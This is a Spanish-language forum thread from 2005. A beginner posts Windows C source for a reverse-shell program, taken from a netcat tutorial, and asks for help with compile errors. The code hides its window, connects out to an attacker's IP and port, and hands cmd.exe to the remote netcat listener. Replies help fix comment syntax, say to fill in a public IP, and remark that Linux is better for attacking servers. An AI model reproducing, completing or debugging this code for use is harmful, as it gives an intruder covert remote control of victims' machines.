Tema destacado: Recuperar cuenta de Google, GMail, Youtube
 Autor
|
Tema: Sobre el exploit de shell inversa y netcat (Leído 1,594 veces)
|
Dinio_Albino
 Desconectado
Mensajes: 25
|
Hola, acabo de leer el manual de netcat de kasswed y en principio dice que: "Una shell directa es bastante fácil de lograr, pero no es la más recomendada, conforme vayáis leyendo os daréis cuenta de sus desventajas." Y yo quería saber cuales era las desventajas en ese caso, por que no soy ningún experto.  He intentado compilar este exploit con el dev c++: #include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el
puerto de conexion NetCat
addr.sin_addr.s_addr = inet_addr("AKI TU IP O DOMINIO
NO-IP");//Atencion a esta linea, aki va tu IP
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
} Pero me da los siguientes errores: http://usuarios.lycos.es/ivaneilu/shell.JPGY por último quería saber si era mejor compilar los exploits e linux o en windows. Gracias por adelantado. Saludos. |
|
|
|
|
En línea
|
|
|
|
whaky
Desconectado
Mensajes: 151
Angel del Infierno
|
donde han puesto comentarios en el exploit debes kompletarlo //
para compilar... pues puedes compilarlo en los dos sistemas. el que mejor sepas usar, la ventaja de linux es q tiene compilador ya instalado y en win2 q tenes q ponerlo.
|
|
|
|
|
En línea
|
Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
Linux Claramente porque se pueden atacar servidores y maquinas con microsoft y Unix.
Con Windows te verás limitado muchas veces ya que la mayoria de los exploits no funcionan en Windows.
|
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Dinio_Albino
Desconectado
Mensajes: 25
|
Ya, vale, gracias, pero es que no compila, y el error no es de las líneas comentadas, mirad el link de la imagen a ver si me podeis ayudar.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
2 cosas men, postea las imagenes como el resto de los mortales, usando la funcion que te regala el foro, creo que debes saber como se usa. Con respecto al exploit muchas veces vienen con fallos a propósito, fallos simples para evitar scripts kiddies http://es.wikipedia.org/wiki/Script_kiddie usandolos, la verdad es que le di un simple vistaso al exploit y no a los errores pero men hasta te estan indicando donde poner y que poner: Atencion a esta linea, aki va el
puerto de conexion NetCat por ej... y creo, solo creo que ese comentario esta mal puesto, lo que deberías hacer si no logras tu arreglar el exploit es buscarlo en otra parte y rezar.... rezar mucho para que funcione perfectamente. |
|
|
|
« Última modificación: 3 Noviembre 2005, 20:21 por SeniorX »
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Dinio_Albino
Desconectado
Mensajes: 25
|
A ver, el que no me entiendes eres tu, primero, ¿tanto cuesta darle al link de la imagen?, lo puse asi porque es muy grande, segundo, no soy tan tonto, y si pongo que me da error al compilar es que me da aunque ponga lo que falta o no lo ponga, se ve claramente en la imagen.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
ok aclaremos algo, ahora que vi la imagen:  Veo que no rellenaste los campos, el exploit no puede adivinar a quien quieres atacar si es un exploit remoto  Como ya te dije seguramente el exploit viene con fallos a proposito asique mejor buscalo por su nombre en google y pruebas hasta q alguno te funcione. Lo de el comentario mal puesto es porque para insertar un comentario multilineal debes usar /* comentario */ pero en tu exploit esta escrito como //, este sirve solo para comentarios de linea, por ej: joder() //llama a la funcion joder si la quieres hacer multilineal debes hacer lo siguiente: joder() /*Llama a
la funcion joder, para que joda*/ Suerte PD: Nunca dije que fueras tan tonto men q onda.... paz  |
|
|
|
« Última modificación: 3 Noviembre 2005, 21:43 por SeniorX »
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Dinio_Albino
Desconectado
Mensajes: 25
|
Vale, pero eso ya lo había hecho, lo que pas es que en la imagen era una captura anterior, mira, lo dejo de tal forma que queda así...  pero sigue dando fallos, así que tendré que buscarlo por otro lado. gracias de todas formas. |
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
en lo ultimo que te puedo ayudar men es diciendo que tu ip no es 127.0.0.1 esa es tu ip local al igual que 192.168.1.1 o 192.168.1.100, te recomiendo pasar por www.cualesmiip.net |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
|
 |
